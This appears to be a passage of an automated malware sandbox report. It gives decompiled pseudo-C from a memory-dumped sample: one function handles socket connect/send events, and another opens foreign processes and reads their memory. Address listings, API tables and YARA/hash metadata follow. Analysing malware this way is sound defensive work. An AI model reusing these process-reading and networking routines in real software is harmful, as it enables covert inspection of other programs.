									__eflags = _t92 - 0x2733;
									if(_t92 == 0x2733) {
										goto L13;
									} else {
										__eflags = _t92;
										if(_t92 != 0) {
											E04EB7AB0();
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_t212 = _t216;
											_t217 = _t216 - 0x18;
											_t94 =  *0x4f03008; // 0x3d21fb31
											_v56 = _t94 ^ _t212;
											_t191 = _v44;
											GetCurrentThreadId();
											 *((intOrPtr*)( *_t191 + 0xbc))(GetCurrentThreadId(), 0, _t197, __ebx, _t210, 0x80004005);
											__eflags =  *(_t191 + 0x38);
											_v76 = 1;
											if( *(_t191 + 0x38) <= 0) {
												L19:
												_t200 = 0;
												__eflags = 0;
											} else {
												__eflags =  *(_t191 + 0x3c);
												if( *(_t191 + 0x3c) <= 0) {
													goto L19;
												} else {
													_t200 = 1;
												}
											}
											_v16 = _t200;
											_t156 =  *((intOrPtr*)( *_t191 + 0xc4))();
											_t22 = _t200 + 4; // 0x5
											_t101 = _t22;
											_v20 = _t156;
											_v28 = _t101;
											__eflags = _t156;
											if(_t156 != 0) {
												_t101 = 1 + _t101;
												__eflags = _t101;
												_v28 = _t101;
											}
											E04EF1480();
											_t167 = _t217;
											_t201 = 0;
											_v24 = _t167;
											_t167->LowPart =  *(_t191 + 0x20);
											_t167->LowPart.HighPart =  *(_t191 + 0x174);
											 *((intOrPtr*)(_t167 + 8)) =  *((intOrPtr*)(_t191 + 0x178));
											 *((intOrPtr*)(_t167 + 0xc)) =  *((intOrPtr*)(_t191 + 0x17c));
											_t107 = 4;
											__eflags = _v16;
											if(__eflags == 0) {
												L25:
												__eflags = _t156;
												if(_t156 != 0) {
													 *(_t167 + _t107 * 4) = _t156;
												}
												_v20 =  *((intOrPtr*)(_t191 + 0x2c));
												_t109 =  *(_t191 + 0x5c);
												__eflags = _t109;
												if(_t109 != 0) {
													E04EDE947(_t109);
													_t217 =  &(_t217->LowPart.HighPart);
													 *(_t191 + 0x5c) = 0;
													 *(_t191 + 0x60) = 0;
													 *(_t191 + 0x64) = 0;
												}
												_t53 = _t191 + 0x5c; // 0x5d
												E04EBAD90(_t53, _v20, _t167, 0);
												_t169 = _t191;
												_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
												__eflags = _t112;
												if(_t112 == 0) {
													L54:
													_t169 = _t191;
													 *((intOrPtr*)( *_t191 + 0xc0))(GetCurrentThreadId());
													__eflags = _v32;
													if(_v32 != 0) {
														_t169 = _t191;
														_t127 =  *((intOrPtr*)( *_t191 + 0x24))();
														__eflags = _t127;
														if(_t127 != 0) {
															_t169 = _t191;
															 *((intOrPtr*)( *_t191 + 4))();
														}
													}
													GetCurrentThreadId();
													__eflags = _t201;
													if(_t201 == 0) {
														L61:
														__eflags = _v12 ^ _t212;
														return E04ED572E(_v12 ^ _t212);
													} else {
														_t118 =  *_t201;
														__eflags = _t118;
														if(_t118 == 0) {
															L60:
															_push(4);
															E04ED5777(_t201);
															goto L61;
														} else {
															_t120 = CloseHandle(_t118);
															__eflags = _t120;
															if(_t120 == 0) {
																goto L64;
															} else {
																goto L60;
															}
														}
													}
												} else {
													_t159 = _v24;
													do {
														__imp__WSAWaitForMultipleEvents(_v28, _t159, 0, 0xffffffff, 0);
														__eflags = _t112;
														if(_t112 != 0) {
															__eflags = _t112 - 1;
															if(_t112 != 1) {
																__eflags = _t112 - 2;
																if(_t112 == 2) {
																	_v32 = 0;
																	goto L54;
																} else {
																	__eflags = _t112 - 3;
																	if(_t112 != 3) {
																		__eflags = _t112 - 4;
																		if(_t112 != 4) {
																			__eflags = _t112 - 5;
																			if(_t112 != 5) {
																				__eflags = _t112 - 0xffffffff;
																				if(_t112 != 0xffffffff) {
																					goto L63;
																				} else {
																					__imp__#111();
																					 *(_t191 + 0xc) = 1;
																					 *(_t191 + 0x10) = 0;
																					 *(_t191 + 0x14) = _t112;
																					 *(_t191 + 0x18) = 1;
																					goto L54;
																				}
																			} else {
																				goto L47;
																			}
																		} else {
																			__eflags = _v16;
																			if(_v16 == 0) {
																				L47:
																				_t132 =  *((intOrPtr*)( *_t191 + 0xc8))();
																				__eflags = _t132;
																				if(_t132 == 0) {
																					_t133 = GetLastError();
																					__eflags = _t133;
																					 *(_t191 + 0xc) = 1;
																					 *(_t191 + 0x10) = 5;
																					_t134 =  ==  ? 0x4c7 : _t133;
																					 *(_t191 + 0x14) =  ==  ? 0x4c7 : _t133;
																					 *(_t191 + 0x18) = 1;
																					goto L54;
																				} else {
																					goto L48;
																				}
																			} else {
																				L65();
																				__eflags = _t112;
																				if(_t112 == 0) {
																					goto L54;
																				} else {
																					goto L48;
																				}
																			}
																		}
																	} else {
																		_t136 = E04ECDFF0(_t112, _t191);
																		__eflags = _t136;
																		if(_t136 == 0) {
																			goto L54;
																		} else {
																			goto L48;
																		}
																	}
																}
															} else {
																_t137 = E04ECE180(_t191);
																__eflags = _t137;
																if(_t137 == 0) {
																	goto L54;
																} else {
																	goto L48;
																}
															}
														} else {
															_t138 = E04ECDD70(_t191);
															__eflags = _t138;
															if(_t138 == 0) {
																goto L54;
															} else {
																goto L48;
															}
														}
														goto L72;
														L48:
														_t169 = _t191;
														_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
														__eflags = _t112;
													} while (_t112 != 0);
													goto L54;
												}
											} else {
												_t140 = E04ED5744(0, __eflags, 4);
												_t217 =  &(_t217->LowPart.HighPart);
												_t201 = _t140;
												 *_t201 = 0;
												_t141 = CreateWaitableTimerW(0, 0, 0);
												 *_t201 = _t141;
												__eflags = _t141;
												if(_t141 == 0) {
													_push(0x80004005);
													E04EB7AB0();
													L63:
													_push(0x80004005);
													E04EB7AB0();
													L64:
													_push(0x80004005);
													E04EB7AB0();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t201);
													_t203 = _t169;
													_t122 =  *(_t203 + 0x188);
													 *(_t203 + 0x188) = 1 +  *(_t203 + 0x188);
													__eflags = _t122 -  *((intOrPtr*)(_t203 + 0x38));
													if(_t122 <  *((intOrPtr*)(_t203 + 0x38))) {
														__imp__#19( *((intOrPtr*)(_t203 + 0x1c)), 0, 0, 0);
														__eflags = _t122 - 0xffffffff;
														if(_t122 != 0xffffffff) {
															L71:
															return 1;
														} else {
															__imp__#111();
															__eflags = _t122 - 0x2733;
															if(_t122 == 0x2733) {
																goto L71;
															} else {
																__eflags = _t122;
																if(_t122 == 0) {
																	goto L71;
																} else {
																	 *(_t203 + 0x14) = _t122;
																	__eflags = 0;
																	 *(_t203 + 0xc) = 1;
																	 *(_t203 + 0x10) = 5;
																	 *(_t203 + 0x18) = 1;
																	return 0;
																}
															}
														}
													} else {
														 *(_t203 + 0xc) = 1;
														__eflags = 0;
														 *(_t203 + 0x10) = 5;
														 *(_t203 + 0x14) = 0;
														 *(_t203 + 0x18) = 0;
														return 0;
													}
												} else {
													_t160 =  *(_t191 + 0x3c);
													E04EF1730();
													_t178 = _t217;
													_t144 = _t160;
													_t145 = _t144 * 0x2710;
													__eflags = _t145;
													asm("adc edx, 0x0");
													_t178->LowPart =  ~_t145;
													_t178->LowPart.HighPart =  ~(_t144 * 0x2710 >> 0x20);
													SetWaitableTimer( *_t201, _t178, _t160, 0, 0, 0);
													_t167 = _v24;
													_t156 = _v20;
													 *(_t167 + 0x10) =  *_t201;
													_t107 = 5;
													goto L25;
												}
											}
										} else {
											goto L13;
										}
									}
								}
							} else {
								_t149 = GetLastError();
								__eflags = _t149;
								_t150 =  ==  ? 0x4c7 : _t149;
								__imp__#112( ==  ? 0x4c7 : _t149);
								return 0;
							}
						}
					}
				} else {
					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
					if(__eax == 0xffffffff) {
						L14:
						return _t189;
					} else {
						_t152 = _a4;
						_t181 =  !=  ? 0x1c : 0x10;
						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t152,  !=  ? 0x1c : 0x10);
						if(_t152 == 0) {
							L13:
							_t189 = 1;
							goto L14;
						} else {
							if(_t152 != 0xffffffff) {
								L5:
								return 0;
							} else {
								__imp__#111();
								if(_t152 == 0x2733) {
									goto L13;
								} else {
									goto L5;
								}
							}
						}
					}
				}
				L72:
			}

















































                                                                                    0x04ecd8e1
                                                                                    0x04ecd8e5
                                                                                    0x04ecd8e7
                                                                                    0x04ecd8ec
                                                                                    0x04ecd94c
                                                                                    0x04ecd959
                                                                                    0x04ecd95d
                                                                                    0x04ecd965
                                                                                    0x04ecd96b
                                                                                    0x04ecd96e
                                                                                    0x00000000
                                                                                    0x04ecd970
                                                                                    0x04ecd978
                                                                                    0x04ecd97e
                                                                                    0x04ecd981
                                                                                    0x00000000
                                                                                    0x04ecd983
                                                                                    0x04ecd983
                                                                                    0x04ecd98c
                                                                                    0x04ecd993
                                                                                    0x04ecd99d
                                                                                    0x04ecd9a0
                                                                                    0x04ecd9a3
                                                                                    0x04ecd9cd
                                                                                    0x04ecd9d3
                                                                                    0x04ecd9d6
                                                                                    0x00000000
                                                                                    0x04ecd9d8
                                                                                    0x04ecd9d8
                                                                                    0x04ecd9de
                                                                                    0x04ecd9e3
                                                                                    0x00000000
                                                                                    0x04ecd9e5
                                                                                    0x04ecd9e5
                                                                                    0x04ecd9e7
                                                                                    0x04ecd9fb
                                                                                    0x04ecda00
                                                                                    0x04ecda01
                                                                                    0x04ecda02
                                                                                    0x04ecda03
                                                                                    0x04ecda04
                                                                                    0x04ecda05
                                                                                    0x04ecda06
                                                                                    0x04ecda07
                                                                                    0x04ecda08
                                                                                    0x04ecda09
                                                                                    0x04ecda0a
                                                                                    0x04ecda0b
                                                                                    0x04ecda0c
                                                                                    0x04ecda0d
                                                                                    0x04ecda0e
                                                                                    0x04ecda0f
                                                                                    0x04ecda11
                                                                                    0x04ecda13
                                                                                    0x04ecda16
                                                                                    0x04ecda1d
                                                                                    0x04ecda29
                                                                                    0x04ecda2c
                                                                                    0x04ecda35
                                                                                    0x04ecda3b
                                                                                    0x04ecda3f
                                                                                    0x04ecda46
                                                                                    0x04ecda55
                                                                                    0x04ecda55
                                                                                    0x04ecda55
                                                                                    0x04ecda48
                                                                                    0x04ecda48
                                                                                    0x04ecda4c
                                                                                    0x00000000
                                                                                    0x04ecda4e
                                                                                    0x04ecda4e
                                                                                    0x04ecda4e
                                                                                    0x04ecda4c
                                                                                    0x04ecda5b
                                                                                    0x04ecda64
                                                                                    0x04ecda66
                                                                                    0x04ecda66
                                                                                    0x04ecda69
                                                                                    0x04ecda6c
                                                                                    0x04ecda6f
                                                                                    0x04ecda71
                                                                                    0x04ecda73
                                                                                    0x04ecda73
                                                                                    0x04ecda74
                                                                                    0x04ecda74
                                                                                    0x04ecda7a
                                                                                    0x04ecda82
                                                                                    0x04ecda84
                                                                                    0x04ecda86
                                                                                    0x04ecda89
                                                                                    0x04ecda91
                                                                                    0x04ecda9a
                                                                                    0x04ecdaa3
                                                                                    0x04ecdaa6
                                                                                    0x04ecdaab
                                                                                    0x04ecdaae
                                                                                    0x04ecdb1b
                                                                                    0x04ecdb1b
                                                                                    0x04ecdb1d
                                                                                    0x04ecdb1f
                                                                                    0x04ecdb1f
                                                                                    0x04ecdb25
                                                                                    0x04ecdb28
                                                                                    0x04ecdb2b
                                                                                    0x04ecdb2d
                                                                                    0x04ecdb30
                                                                                    0x04ecdb35
                                                                                    0x04ecdb38
                                                                                    0x04ecdb3f
                                                                                    0x04ecdb46
                                                                                    0x04ecdb46
                                                                                    0x04ecdb53
                                                                                    0x04ecdb56
                                                                                    0x04ecdb5d
                                                                                    0x04ecdb5f
                                                                                    0x04ecdb62
                                                                                    0x04ecdb64
                                                                                    0x04ecdc64
                                                                                    0x04ecdc6d
                                                                                    0x04ecdc6f
                                                                                    0x04ecdc75
                                                                                    0x04ecdc79
                                                                                    0x04ecdc7d
                                                                                    0x04ecdc7f
                                                                                    0x04ecdc82
                                                                                    0x04ecdc84
                                                                                    0x04ecdc88
                                                                                    0x04ecdc8a
                                                                                    0x04ecdc8a
                                                                                    0x04ecdc84
                                                                                    0x04ecdc8d
                                                                                    0x04ecdc93
                                                                                    0x04ecdc95
                                                                                    0x04ecdcb3
                                                                                    0x04ecdcbe
                                                                                    0x04ecdcc8
                                                                                    0x04ecdc97
                                                                                    0x04ecdc97
                                                                                    0x04ecdc99
                                                                                    0x04ecdc9b
                                                                                    0x04ecdca8
                                                                                    0x04ecdca8
                                                                                    0x04ecdcab
                                                                                    0x00000000
                                                                                    0x04ecdc9d
                                                                                    0x04ecdc9e
                                                                                    0x04ecdca4
                                                                                    0x04ecdca6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecdca6
                                                                                    0x04ecdc9b
                                                                                    0x04ecdb6a
                                                                                    0x04ecdb6a
                                                                                    0x04ecdb70
                                                                                    0x04ecdb7a
                                                                                    0x04ecdb80
                                                                                    0x04ecdb82
                                                                                    0x04ecdb95
                                                                                    0x04ecdb98
                                                                                    0x04ecdbab
                                                                                    0x04ecdbae
                                                                                    0x04ecdc5d
                                                                                    0x00000000
                                                                                    0x04ecdbb4
                                                                                    0x04ecdbb4
                                                                                    0x04ecdbb7
                                                                                    0x04ecdbca
                                                                                    0x04ecdbcd
                                                                                    0x04ecdbe6
                                                                                    0x04ecdbe9
                                                                                    0x04ecdc34
                                                                                    0x04ecdc37
                                                                                    0x00000000
                                                                                    0x04ecdc3d
                                                                                    0x04ecdc3d
                                                                                    0x04ecdc43
                                                                                    0x04ecdc4a
                                                                                    0x04ecdc51
                                                                                    0x04ecdc54
                                                                                    0x00000000
                                                                                    0x04ecdc54
                                                                                    0x04ecdbeb
                                                                                    0x00000000
                                                                                    0x04ecdbeb
                                                                                    0x04ecdbcf
                                                                                    0x04ecdbcf
                                                                                    0x04ecdbd5
                                                                                    0x04ecdbed
                                                                                    0x04ecdbef
                                                                                    0x04ecdbf5
                                                                                    0x04ecdbf7
                                                                                    0x04ecdc0a
                                                                                    0x04ecdc10
                                                                                    0x04ecdc12
                                                                                    0x04ecdc1e
                                                                                    0x04ecdc25
                                                                                    0x04ecdc28
                                                                                    0x04ecdc2b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecdbd7
                                                                                    0x04ecdbd7
                                                                                    0x04ecdbdc
                                                                                    0x04ecdbde
                                                                                    0x00000000
                                                                                    0x04ecdbe4
                                                                                    0x00000000
                                                                                    0x04ecdbe4
                                                                                    0x04ecdbde
                                                                                    0x04ecdbd5
                                                                                    0x04ecdbb9
                                                                                    0x04ecdbbb
                                                                                    0x04ecdbc0
                                                                                    0x04ecdbc2
                                                                                    0x00000000
                                                                                    0x04ecdbc8
                                                                                    0x00000000
                                                                                    0x04ecdbc8
                                                                                    0x04ecdbc2
                                                                                    0x04ecdbb7
                                                                                    0x04ecdb9a
                                                                                    0x04ecdb9c
                                                                                    0x04ecdba1
                                                                                    0x04ecdba3
                                                                                    0x00000000
                                                                                    0x04ecdba9
                                                                                    0x00000000
                                                                                    0x04ecdba9
                                                                                    0x04ecdba3
                                                                                    0x04ecdb84
                                                                                    0x04ecdb86
                                                                                    0x04ecdb8b
                                                                                    0x04ecdb8d
                                                                                    0x00000000
                                                                                    0x04ecdb93
                                                                                    0x00000000
                                                                                    0x04ecdb93
                                                                                    0x04ecdb8d
                                                                                    0x00000000
                                                                                    0x04ecdbf9
                                                                                    0x04ecdbfb
                                                                                    0x04ecdbfd
                                                                                    0x04ecdc00
                                                                                    0x04ecdc00
                                                                                    0x00000000
                                                                                    0x04ecdc08
                                                                                    0x04ecdab0
                                                                                    0x04ecdab1
                                                                                    0x04ecdab6
                                                                                    0x04ecdab9
                                                                                    0x04ecdac1
                                                                                    0x04ecdac7
                                                                                    0x04ecdacd
                                                                                    0x04ecdacf
                                                                                    0x04ecdad1
                                                                                    0x04ecdccb
                                                                                    0x04ecdcd0
                                                                                    0x04ecdcd5
                                                                                    0x04ecdcd5
                                                                                    0x04ecdcda
                                                                                    0x04ecdcdf
                                                                                    0x04ecdcdf
                                                                                    0x04ecdce4
                                                                                    0x04ecdce9
                                                                                    0x04ecdcea
                                                                                    0x04ecdceb
                                                                                    0x04ecdcec
                                                                                    0x04ecdced
                                                                                    0x04ecdcee
                                                                                    0x04ecdcef
                                                                                    0x04ecdcf0
                                                                                    0x04ecdcf1
                                                                                    0x04ecdcf6
                                                                                    0x04ecdcfc
                                                                                    0x04ecdd02
                                                                                    0x04ecdd04
                                                                                    0x04ecdd2f
                                                                                    0x04ecdd35
                                                                                    0x04ecdd38
                                                                                    0x04ecdd67
                                                                                    0x04ecdd6d
                                                                                    0x04ecdd3a
                                                                                    0x04ecdd3a
                                                                                    0x04ecdd40
                                                                                    0x04ecdd45
                                                                                    0x00000000
                                                                                    0x04ecdd47
                                                                                    0x04ecdd47
                                                                                    0x04ecdd49
                                                                                    0x00000000
                                                                                    0x04ecdd4b
                                                                                    0x04ecdd4b
                                                                                    0x04ecdd4e
                                                                                    0x04ecdd50
                                                                                    0x04ecdd57
                                                                                    0x04ecdd5e
                                                                                    0x04ecdd66
                                                                                    0x04ecdd66
                                                                                    0x04ecdd49
                                                                                    0x04ecdd45
                                                                                    0x04ecdd06
                                                                                    0x04ecdd06
                                                                                    0x04ecdd0d
                                                                                    0x04ecdd0f
                                                                                    0x04ecdd16
                                                                                    0x04ecdd1d
                                                                                    0x04ecdd25
                                                                                    0x04ecdd25
                                                                                    0x04ecdad7
                                                                                    0x04ecdad7
                                                                                    0x04ecdadf
                                                                                    0x04ecdae4
                                                                                    0x04ecdae6
                                                                                    0x04ecdaed
                                                                                    0x04ecdaed
                                                                                    0x04ecdaf7
                                                                                    0x04ecdafa
                                                                                    0x04ecdb00
                                                                                    0x04ecdb05
                                                                                    0x04ecdb0b
                                                                                    0x04ecdb10
                                                                                    0x04ecdb13
                                                                                    0x04ecdb16
                                                                                    0x00000000
                                                                                    0x04ecdb16
                                                                                    0x04ecdad1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecd9e7
                                                                                    0x04ecd9e3
                                                                                    0x04ecd9a5
                                                                                    0x04ecd9a5
                                                                                    0x04ecd9ab
                                                                                    0x04ecd9b2
                                                                                    0x04ecd9b6
                                                                                    0x04ecd9c1
                                                                                    0x04ecd9c1
                                                                                    0x04ecd9a3
                                                                                    0x04ecd981
                                                                                    0x04ecd8ee
                                                                                    0x04ecd8f6
                                                                                    0x04ecd8ff
                                                                                    0x04ecd9ee
                                                                                    0x04ecd9f3
                                                                                    0x04ecd905
                                                                                    0x04ecd905
                                                                                    0x04ecd916
                                                                                    0x04ecd91e
                                                                                    0x04ecd926
                                                                                    0x04ecd9e9
                                                                                    0x04ecd9e9
                                                                                    0x00000000
                                                                                    0x04ecd92c
                                                                                    0x04ecd92f
                                                                                    0x04ecd942
                                                                                    0x04ecd949
                                                                                    0x04ecd931
                                                                                    0x04ecd931
                                                                                    0x04ecd93c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecd93c
                                                                                    0x04ecd92f
                                                                                    0x04ecd926
                                                                                    0x04ecd8ff
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECD8F6
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECD91E
                                                                                    • WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD931
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECD965
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECD978
                                                                                    • SetLastError.KERNEL32(00000000,?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD993
                                                                                    • GetLastError.KERNEL32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9A5
                                                                                    • WSASetLastError.WS2_32(00000000,?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9B6
                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 04ECD9CD
                                                                                    • WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9D8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDA2C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDA30
                                                                                    • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000,74E04C30), ref: 04ECDAC7
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 04ECDB05
                                                                                    • WSAWaitForMultipleEvents.WS2_32(?,?,00000000,000000FF,00000000,?,00000000,?,74E04C30), ref: 04ECDB7A
                                                                                    • GetLastError.KERNEL32(?,00000000,?,74E04C30), ref: 04ECDC0A
                                                                                    • WSAGetLastError.WS2_32(?,00000000,?,74E04C30), ref: 04ECDC3D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDC66
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDC8D
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,74E04C30), ref: 04ECDC9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnect$CloseCreateEventsHandleMultipleWaitsend
                                                                                    • String ID:
                                                                                    • API String ID: 2019364350-0
                                                                                    • Opcode ID: e53778d1f9d92c2bb2f9c1336f9f572d37d52d38075132cbee4dbdb88805f962
                                                                                    • Instruction ID: 1ac91c7d8364dc26ef6a4f7e952ce750c3d35b06d9abb862d1775befbcdc2adf
                                                                                    • Opcode Fuzzy Hash: e53778d1f9d92c2bb2f9c1336f9f572d37d52d38075132cbee4dbdb88805f962
                                                                                    • Instruction Fuzzy Hash: 8EC1AE70700205AFEB209F25CD88F6ABBA5FF84319F14553DE919D7280DBB6E852CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6060, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 186libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E04EB6060(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi) {
				signed int _v12;
				intOrPtr _v16;
				DWORD* _v20;
				DWORD* _v36;
				void* _v44;
				signed int _v48;
				void _v112;
				void* _v568;
				void _v584;
				DWORD* _v588;
				DWORD* _v592;
				void* _v612;
				char _v616;
				signed int _t46;
				void* _t49;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t53;
				struct HINSTANCE__* _t54;
				signed int _t55;
				signed int _t59;
				signed int _t61;
				signed int _t80;
				void* _t90;
				intOrPtr _t104;
				intOrPtr* _t118;
				void* _t120;
				void* _t122;
				signed int _t123;

				_t46 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t46 ^ _t123;
				_t118 = __ecx;
				_t90 = OpenProcess(0x1fffff, 0, __edx);
				_t49 = GetCurrentProcess();
				_t120 = LoadLibraryA;
				_v588 = _t49;
				_v592 = 0;
				_t51 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
				if(_t51 != 0) {
					 *_t51(_v588,  &_v592);
				}
				_v588 = 0;
				_t53 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
				if(_t53 != 0) {
					 *_t53(_t90,  &_v588);
				}
				if(_v592 != 1 || _v588 != 0) {
					_t54 = GetModuleHandleA("ntdll.dll");
					__eflags = _t54;
					if(_t54 != 0) {
						L9:
						_t55 = GetProcAddress(_t54, "NtQueryInformationProcess");
						__eflags = _t55;
						if(_t55 == 0) {
							goto L18;
						} else {
							_t59 =  *_t55(_t90, 0,  &_v616, 0x18, 0);
							__eflags = _t59;
							if(_t59 < 0) {
								goto L18;
							} else {
								_t61 = ReadProcessMemory(_t90, _v612,  &_v584, 0x1d8, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L18;
								} else {
									__eflags = ReadProcessMemory(_t90, _v568,  &_v112, 0x48, 0);
									if(__eflags == 0) {
										goto L18;
									} else {
										_push( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002);
										_t122 = E04ED5785( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002, ReadProcessMemory, __eflags);
										E04EDDAD0(_t118, _t122, 0, 2 + (_v48 & 0x0000ffff) * 2);
										ReadProcessMemory(_t90, _v44, _t122, _v48 & 0x0000ffff, 0);
										E04EB31B0( &_v36, _t118, _t122);
										E04ED573F(_t122);
										 *((intOrPtr*)(_t118 + 0x14)) = 7;
										 *(_t118 + 0x10) = 0;
										 *_t118 = 0;
										_t104 = _v16;
										__eflags = _t104 - 8;
										if(_t104 >= 8) {
											 *_t118 = _v36;
											_v36 = 0;
										} else {
											_t80 =  &(_v20[0]);
											__eflags = _t80;
											if(_t80 != 0) {
												E04EDCC90(_t118,  &_v36, _t80 + _t80);
												_t104 = _v16;
											}
										}
										 *(_t118 + 0x10) = _v20;
										 *((intOrPtr*)(_t118 + 0x14)) = _t104;
										_v16 = 7;
										_v20 = 0;
										_v36 = 0;
										E04EB3170( &_v36);
										__eflags = _v12 ^ _t123;
										return E04ED572E(_v12 ^ _t123);
									}
								}
							}
						}
					} else {
						_t54 = LoadLibraryA("ntdll.dll");
						__eflags = _t54;
						if(_t54 == 0) {
							L18:
							E04EB31B0(_t118, _t118, 0x4efb5d0);
							__eflags = _v12 ^ _t123;
							return E04ED572E(_v12 ^ _t123);
						} else {
							goto L9;
						}
					}
				} else {
					E04EB5DA0(_t90, _t118, _t90, _t118, _t120);
					return E04ED572E(_v12 ^ _t123);
				}
			}































                                                                                    0x04eb6069
                                                                                    0x04eb6070
                                                                                    0x04eb607e
                                                                                    0x04eb6086
                                                                                    0x04eb6088
                                                                                    0x04eb608e
                                                                                    0x04eb609e
                                                                                    0x04eb60a4
                                                                                    0x04eb60b1
                                                                                    0x04eb60b9
                                                                                    0x04eb60c8
                                                                                    0x04eb60c8
                                                                                    0x04eb60d4
                                                                                    0x04eb60e1
                                                                                    0x04eb60e9
                                                                                    0x04eb60f3
                                                                                    0x04eb60f3
                                                                                    0x04eb60fc
                                                                                    0x04eb6128
                                                                                    0x04eb612e
                                                                                    0x04eb6130
                                                                                    0x04eb6141
                                                                                    0x04eb6147
                                                                                    0x04eb614d
                                                                                    0x04eb614f
                                                                                    0x00000000
                                                                                    0x04eb6155
                                                                                    0x04eb6163
                                                                                    0x04eb6165
                                                                                    0x04eb6167
                                                                                    0x00000000
                                                                                    0x04eb616d
                                                                                    0x04eb6188
                                                                                    0x04eb618a
                                                                                    0x04eb618c
                                                                                    0x00000000
                                                                                    0x04eb6192
                                                                                    0x04eb61a3
                                                                                    0x04eb61a5
                                                                                    0x00000000
                                                                                    0x04eb61ab
                                                                                    0x04eb61c0
                                                                                    0x04eb61cd
                                                                                    0x04eb61da
                                                                                    0x04eb61ee
                                                                                    0x04eb61f8
                                                                                    0x04eb61fe
                                                                                    0x04eb6205
                                                                                    0x04eb620c
                                                                                    0x04eb6216
                                                                                    0x04eb6219
                                                                                    0x04eb621c
                                                                                    0x04eb621f
                                                                                    0x04eb6241
                                                                                    0x04eb6243
                                                                                    0x04eb6221
                                                                                    0x04eb6224
                                                                                    0x04eb6224
                                                                                    0x04eb6227
                                                                                    0x04eb6231
                                                                                    0x04eb6236
                                                                                    0x04eb6239
                                                                                    0x04eb6227
                                                                                    0x04eb624d
                                                                                    0x04eb6252
                                                                                    0x04eb6258
                                                                                    0x04eb625f
                                                                                    0x04eb6266
                                                                                    0x04eb626a
                                                                                    0x04eb6277
                                                                                    0x04eb6281
                                                                                    0x04eb6281
                                                                                    0x04eb61a5
                                                                                    0x04eb618c
                                                                                    0x04eb6167
                                                                                    0x04eb6132
                                                                                    0x04eb6137
                                                                                    0x04eb6139
                                                                                    0x04eb613b
                                                                                    0x04eb6282
                                                                                    0x04eb6289
                                                                                    0x04eb6295
                                                                                    0x04eb62a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb613b
                                                                                    0x04eb6107
                                                                                    0x04eb610b
                                                                                    0x04eb6122
                                                                                    0x04eb6122

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000), ref: 04EB6080
                                                                                    • GetCurrentProcess.KERNEL32 ref: 04EB6088
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EB60AE
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EB60B1
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EB60DE
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EB60E1
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB6128
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB6137
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 04EB6147
                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000), ref: 04EB6188
                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000), ref: 04EB61A1
